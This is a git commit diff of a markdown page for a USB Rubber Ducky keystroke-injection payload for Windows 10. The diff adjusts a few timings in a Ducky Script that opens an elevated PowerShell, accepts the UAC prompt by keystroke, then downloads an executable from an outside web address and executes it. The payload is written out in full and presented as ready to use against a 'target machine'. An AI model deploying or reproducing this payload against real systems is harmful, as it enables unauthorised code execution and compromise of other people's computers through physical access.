Updated Payload Windows 10 : Download and execute file with Powershell (markdown)

This commit is contained in:
Hunter 2016-11-02 13:10:05 -04:00
parent 02e4a6fe9c
commit d99bb48c7a
1 changed files with 4 additions and 3 deletions

View File

@ -2,8 +2,9 @@ A ducky script that uses the powershell to download and execute a file from a we
Change the link and what name to save the file as.
Execution time: 5-8 seconds (delays will need to be modified based on target machine speed)
Preview: https://www.youtube.com/watch?v=gGHjdtamQ9A
Preview video: https://www.youtube.com/watch?v=gGHjdtamQ9A
```
REM Windows 10: Poweshell administrator download and execute file
@ -13,7 +14,7 @@ REM
REM start of script
REM
REM let the HID enumerate
DELAY 2000
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
@ -21,6 +22,6 @@ STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 500
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
```